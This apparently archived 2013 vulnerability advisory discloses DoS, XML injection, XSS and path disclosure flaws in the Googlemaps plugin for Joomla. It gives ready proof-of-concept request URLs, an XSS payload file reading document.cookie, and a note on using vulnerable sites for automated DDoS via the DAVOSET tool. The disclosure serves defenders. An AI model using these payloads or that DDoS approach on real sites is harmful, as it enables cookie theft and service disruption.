Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29645
HistoryJul 19, 2013 - 12:00 a.m.

Multiple vulnerabilities in Googlemaps plugin for Joomla

2013-07-1900:00:00
vulners.com
5918

Hello 3APA3A!

These are Denial of Service, XML Injection, Cross-Site Scripting and Full path disclosure vulnerabilities in Googlemaps plugin for Joomla.


Affected products:

Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x and potentially previous versions. In new version of DAVOSET I'll add a lot of web sites with Googlemaps plugin.


Affected vendors:

Mike Reumer
http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147


Details:

Denial of Service (WASC-10):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file

Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).

XML Injection (WASC-23):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml

It's possible to include external xml-files. Which also can be used for XSS attack:

XSS via XML Injection (WASC-23):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml

File xss.xml:

<?xml version="1.0" encoding="utf-8"?>
<feed>
<title>XSS</title>
<entry>
<div xmlns="http://www.w3.org/1999/xhtml&quot;&gt;&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;&lt;/div&gt;
</entry>
</feed>

Cross-Site Scripting (WASC-08):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=&#37;3Cbody&#37;20onload=alert&#40;document.cookie&#41;&#37;3E

Full path disclosure (WASC-13):

http://site/plugins/content/plugin_googlemap2_proxy.php

Besides plugin_googlemap2_proxy.php, also happens plugin_googlemap3_proxy.php (but it has other path at web sites).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua